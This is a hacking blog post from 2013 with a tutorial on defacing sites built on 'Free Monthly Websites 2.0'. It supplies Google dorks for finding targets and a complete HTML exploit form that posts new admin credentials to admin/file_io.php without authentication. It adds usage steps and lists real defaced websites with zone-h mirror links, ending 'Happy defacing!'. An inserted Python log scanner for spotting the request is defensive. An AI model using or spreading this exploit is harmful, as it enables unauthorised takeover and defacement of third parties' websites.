Thursday, 25 April 2013

Free Monthly Websites 2.0 Administrator Remote Password Change

Defacing a website with a remote password change

Assalamualaikum and greetings. Today I want to teach a new exploit: remote administrator password change. What is it?
This exploit can remotely change the admin username and password on a vulnerable website. The form below posts the new credentials straight to admin/file_io.php with do_type set to admin_settings_write, and no login step comes before it.

OK, let's start.

1. First, find a target site using one of the Google dorks below:


- inurl:/index_ebay.php

- "Powered by: Resell Rights Fortune"
- Powered By: Free Monthly Websites 2.0

2. Copy the script below:

Change http://www.target.com/ to the link of the target site you found earlier.


<html>

        <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
    <body>
            <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
            <form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
            <input type="hidden" name="do_type" value="admin_settings_write">
        <tr>
            <td height="100" colspan="2" align="center" valign="middle">
            <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
        </tr>
        <tr>
            <td width="300" height="50" align="center" valign="middle">
            <font color="#808080">New Username:</font>
            </td>
            <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
        </tr>
            </td>
        <tr>
            <td width="300" height="62" align="center" valign="middle">
            <font color="#808080">New Password: </font> </td>
            <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" ><p>
            <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
            </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
                <a href="http://www.y-aboukir.info/" style="text-decoration: none">
                <font color="#000000">Yassin ABOUKIR</font></a></p></td>
        </tr>
    </body>
</html>




Save it as exploit.html.

3. After that, open the script you just saved in your browser (right click > open with > browser).


Fill in the New Username and New Password boxes with anything you like. The username and password you enter here will be used to log in to the target website.

Once they are filled in, click Save. If it succeeds, you will be redirected to the login page of the target website :D




What you need to do next is log in with the username and password you just created!

If it fails, this message appears:
The file settings/admin_settings.txt is not writable

Once you have logged in successfully, you can deface :D
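For site owners, one way to spot this request in web-server logs, as an added example that is not part of the original post: the form is opened from a local file, so the POST to /admin/file_io.php arrives with no same-site Referer. The log lines, the host shop.example.com, the other admin paths, the 302 status and the function name are constructed for illustration, and the Apache/nginx combined log format is assumed.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" format (assumed log layout).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)
SETTINGS_ENDPOINT = "/admin/file_io.php"  # form action shown on this page


def suspicious_settings_writes(lines, site_host):
    """Return (ip, timestamp, referer) for every POST to the settings
    endpoint whose Referer is missing or names a different host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare the path only, so a query string does not hide the request.
        if urlsplit(m["path"]).path != SETTINGS_ENDPOINT:
            continue
        # hostname is None for "-" or an empty Referer.
        if urlsplit(m["referer"]).hostname != site_host.lower():
            hits.append((m["ip"], m["ts"], m["referer"]))
    return hits


# Constructed sample lines (documentation IP ranges, hypothetical host and paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Apr/2013:10:01:12 +0000] "GET /admin/index.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Apr/2013:10:02:40 +0000] "POST /admin/file_io.php HTTP/1.1" 302 0 "http://shop.example.com/admin/settings.php" "Mozilla/5.0"',
    '203.0.113.45 - - [25/Apr/2013:11:15:03 +0000] "POST /admin/file_io.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [25/Apr/2013:12:30:51 +0000] "POST /admin/file_io.php?x=1 HTTP/1.1" 302 0 "http://other.example.net/form.html" "Mozilla/5.0"',
    '203.0.113.45 - - [25/Apr/2013:11:15:09 +0000] "GET /admin/index.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, ref in suspicious_settings_writes(SAMPLE_LOG, "shop.example.com"):
        print(f"{ts} {ip} POST {SETTINGS_ENDPOINT} referer={ref!r}")
```

Referer is client-controlled, so treat a hit as a lead to correlate with the modification time of settings/admin_settings.txt rather than as proof. The fix itself is for admin/file_io.php to refuse settings writes that do not come from an authenticated admin session.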

Here are examples of websites I got:


http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275

http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294

You can try it with these websites. Happy defacing!
Item Reviewed: Free Monthly Websites 2.0 Administrator Remote Password Change Description: Rating: 5 Reviewed By Afif Zafri


© 2011 - Reaperz All rights reserved